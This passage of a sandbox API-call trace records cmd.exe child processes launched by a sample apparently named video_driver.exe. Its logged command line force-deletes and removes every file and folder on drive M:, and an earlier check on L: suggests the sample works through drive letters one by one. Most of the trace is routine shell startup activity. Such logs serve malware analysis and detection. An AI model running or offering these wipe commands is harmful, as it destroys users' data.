[0063.934] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0063.934] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0063.935] GetProcessHeap () returned 0x470000 [0063.935] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x4831f0 [0063.935] GetProcessHeap () returned 0x470000 [0063.935] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1c) returned 0x4857e0 [0063.935] GetProcessHeap () returned 0x470000 [0063.935] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4857e0, Size=0x14) returned 0x483210 [0063.935] GetProcessHeap () returned 0x470000 [0063.935] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x483210) returned 0x14 [0063.936] _wcsicmp (_String1="del", _String2=")") returned 59 [0063.936] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0063.936] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0063.936] _wcsicmp (_String1="IF", _String2="del") returned 5 [0063.936] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0063.936] _wcsicmp (_String1="REM", _String2="del") returned 14 [0063.936] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0063.936] GetProcessHeap () returned 0x470000 [0063.937] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483230 [0063.937] GetProcessHeap () returned 0x470000 [0063.938] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x47ffd8 [0063.939] GetProcessHeap () returned 0x470000 [0063.939] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x28) returned 0x483290 [0063.940] GetProcessHeap () returned 0x470000 [0063.941] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x4832c0 [0063.941] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0063.941] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0063.941] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0063.941] GetProcessHeap () returned 0x470000 [0063.941] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483320 [0063.941] GetProcessHeap () returned 0x470000 [0063.941] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x483380 [0063.942] GetProcessHeap () returned 0x470000 [0063.942] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x4833d0 [0063.942] GetProcessHeap () returned 0x470000 [0063.942] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4833d0, Size=0x12) returned 0x4833d0 [0063.943] GetProcessHeap () returned 0x470000 [0063.943] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4833d0) returned 0x12 [0063.943] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0063.943] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0063.943] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0063.943] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0063.943] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0063.943] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0063.944] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0063.945] GetProcessHeap () returned 0x470000 [0063.945] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x12) returned 0x4833f0 [0063.945] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0063.946] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0063.946] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0063.946] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0063.946] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0063.946] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0063.946] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0063.946] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0063.947] GetProcessHeap () returned 0x470000 [0063.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x483410 [0063.947] GetProcessHeap () returned 0x470000 [0063.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x14) returned 0x483470 [0063.947] GetProcessHeap () returned 0x470000 [0063.947] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x20) returned 0x4857e0 [0063.950] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0063.952] GetFullPathNameW (in: lpFileName="L:", nBufferLength=0x208, lpBuffer=0x1af350, lpFilePart=0x1af0fc | out: lpBuffer="L:\\", lpFilePart=0x1af0fc*=0x0) returned 0x3 [0063.953] wcsncmp (_String1="L:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -16 [0063.958] GetFileAttributesW (lpFileName="L:\\" (normalized: "l:")) returned 0xffffffff [0064.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.068] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.068] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.068] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.068] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.069] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.069] SetConsoleInputExeNameW () returned 0x1 [0064.069] GetConsoleOutputCP () returned 0x1b5 [0064.069] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.070] exit (_Code=0) Process: id = "33" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41104000" os_pid = "0xa94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 61 os_tid = 0x5e0 [0064.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fc14 | out: lpSystemTimeAsFileTime=0x36fc14*(dwLowDateTime=0x4316be0, dwHighDateTime=0x1d62400)) [0064.383] GetCurrentProcessId () returned 0xa94 [0064.383] GetCurrentThreadId () returned 0x5e0 [0064.383] GetTickCount () returned 0x11478a9 [0064.383] QueryPerformanceCounter (in: lpPerformanceCount=0x36fc0c | out: lpPerformanceCount=0x36fc0c*=18451662959) returned 1 [0064.384] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0064.384] __set_app_type (_Type=0x1) [0064.384] __p__fmode () returned 0x770331f4 [0064.385] __p__commode () returned 0x770331fc [0064.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0064.385] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0064.385] GetCurrentThreadId () returned 0x5e0 [0064.385] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x5e0) returned 0x60 [0064.385] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.386] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.386] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.386] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.386] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x36fba4 | out: phkResult=0x36fba4*=0x0) returned 0x2 [0064.386] VirtualQuery (in: lpAddress=0x36fbdb, lpBuffer=0x36fb74, dwLength=0x1c | out: lpBuffer=0x36fb74*(BaseAddress=0x36f000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.386] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x36fb74, dwLength=0x1c | out: lpBuffer=0x36fb74*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.386] VirtualQuery (in: lpAddress=0x271000, lpBuffer=0x36fb74, dwLength=0x1c | out: lpBuffer=0x36fb74*(BaseAddress=0x271000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.386] VirtualQuery (in: lpAddress=0x273000, lpBuffer=0x36fb74, dwLength=0x1c | out: lpBuffer=0x36fb74*(BaseAddress=0x273000, AllocationBase=0x270000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.386] VirtualQuery (in: lpAddress=0x370000, lpBuffer=0x36fb74, dwLength=0x1c | out: lpBuffer=0x36fb74*(BaseAddress=0x370000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x180000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0064.386] GetConsoleOutputCP () returned 0x1b5 [0064.387] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.387] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0064.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.387] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.388] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.388] GetEnvironmentStringsW () returned 0x7020f8* [0064.388] GetProcessHeap () returned 0x6f0000 [0064.388] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xaca) returned 0x702bd0 [0064.388] FreeEnvironmentStringsW (penv=0x7020f8) returned 1 [0064.388] GetProcessHeap () returned 0x6f0000 [0064.388] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4) returned 0x701898 [0064.388] GetEnvironmentStringsW () returned 0x7020f8* [0064.388] GetProcessHeap () returned 0x6f0000 [0064.389] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xaca) returned 0x7036a8 [0064.389] FreeEnvironmentStringsW (penv=0x7020f8) returned 1 [0064.389] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36eb14 | out: phkResult=0x36eb14*=0x68) returned 0x0 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x0, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x1, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x1, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x0, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x40, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x40, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.389] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x40, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.389] RegCloseKey (hKey=0x68) returned 0x0 [0064.389] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x36eb14 | out: phkResult=0x36eb14*=0x68) returned 0x0 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x40, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x1, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x1, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x0, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x9, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x4, lpData=0x36eb20*=0x9, lpcbData=0x36eb18*=0x4) returned 0x0 [0064.390] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x36eb1c, lpData=0x36eb20, lpcbData=0x36eb18*=0x1000 | out: lpType=0x36eb1c*=0x0, lpData=0x36eb20*=0x9, lpcbData=0x36eb18*=0x1000) returned 0x2 [0064.390] RegCloseKey (hKey=0x68) returned 0x0 [0064.390] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6a [0064.390] srand (_Seed=0x5eb34b6a) [0064.390] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" [0064.391] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"M:\" del /f /s /q \"M:\" & FOR /D %p IN (\"M:\") DO rmdir \"%p\" /s /q" [0064.391] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.392] GetProcessHeap () returned 0x6f0000 [0064.392] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x210) returned 0x7020f8 [0064.392] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x702100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.392] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.392] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.392] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.392] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.392] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.392] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0064.392] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.392] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.392] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.392] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.392] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.392] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.392] GetProcessHeap () returned 0x6f0000 [0064.392] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x702bd0 | out: hHeap=0x6f0000) returned 1 [0064.392] GetEnvironmentStringsW () returned 0x702310* [0064.393] GetProcessHeap () returned 0x6f0000 [0064.393] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xae2) returned 0x704c70 [0064.393] FreeEnvironmentStringsW (penv=0x702310) returned 1 [0064.393] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.393] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.393] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.393] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.393] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.393] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.393] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.393] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.393] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.393] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.393] GetProcessHeap () returned 0x6f0000 [0064.393] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x54) returned 0x7017c8 [0064.393] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x36f8e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.393] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x36f8e0, lpFilePart=0x36f8dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x36f8dc*="Desktop") returned 0x25 [0064.394] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.394] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x36f65c | out: lpFindFileData=0x36f65c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x705760 [0064.394] FindClose (in: hFindFile=0x705760 | out: hFindFile=0x705760) returned 1 [0064.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x36f65c | out: lpFindFileData=0x36f65c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x705760 [0064.394] FindClose (in: hFindFile=0x705760 | out: hFindFile=0x705760) returned 1 [0064.394] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.394] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x36f65c | out: lpFindFileData=0x36f65c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x705760 [0064.394] FindClose (in: hFindFile=0x705760 | out: hFindFile=0x705760) returned 1 [0064.395] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.395] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.395] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.395] GetProcessHeap () returned 0x6f0000 [0064.395] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x704c70 | out: hHeap=0x6f0000) returned 1 [0064.395] GetEnvironmentStringsW () returned 0x704180* [0064.395] GetProcessHeap () returned 0x6f0000 [0064.395] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xb36) returned 0x705fa0 [0064.395] FreeEnvironmentStringsW (penv=0x704180) returned 1 [0064.395] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.395] GetProcessHeap () returned 0x6f0000 [0064.395] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7017c8 | out: hHeap=0x6f0000) returned 1 [0064.395] GetProcessHeap () returned 0x6f0000 [0064.396] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x400e) returned 0x706ae0 [0064.396] GetProcessHeap () returned 0x6f0000 [0064.396] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xa0) returned 0x702e50 [0064.396] GetProcessHeap () returned 0x6f0000 [0064.396] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x706ae0 | out: hHeap=0x6f0000) returned 1 [0064.396] GetConsoleOutputCP () returned 0x1b5 [0064.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.397] GetUserDefaultLCID () returned 0x409 [0064.398] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0064.398] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x36fa20, cchData=128 | out: lpLCData="0") returned 2 [0064.398] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x36fa20, cchData=128 | out: lpLCData="0") returned 2 [0064.398] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x36fa20, cchData=128 | out: lpLCData="1") returned 2 [0064.398] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0064.399] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0064.400] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0064.401] GetProcessHeap () returned 0x6f0000 [0064.401] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20c) returned 0x702ef8 [0064.401] GetConsoleTitleW (in: lpConsoleTitle=0x702ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0064.402] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.402] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0064.402] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0064.402] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0064.403] GetProcessHeap () returned 0x6f0000 [0064.403] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x400a) returned 0x706ae0 [0064.403] GetProcessHeap () returned 0x6f0000 [0064.403] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4008) returned 0x70aaf8 [0064.404] GetProcessHeap () returned 0x6f0000 [0064.404] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1a) returned 0x7057e0 [0064.404] GetEnvironmentVariableW (in: lpName="p IN (\"M", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="CD") returned 13 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="ERRORLEVEL") returned 11 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="CMDEXTVERSION") returned 13 [0064.404] _wcsicmp (_String1="p IN (\"M", 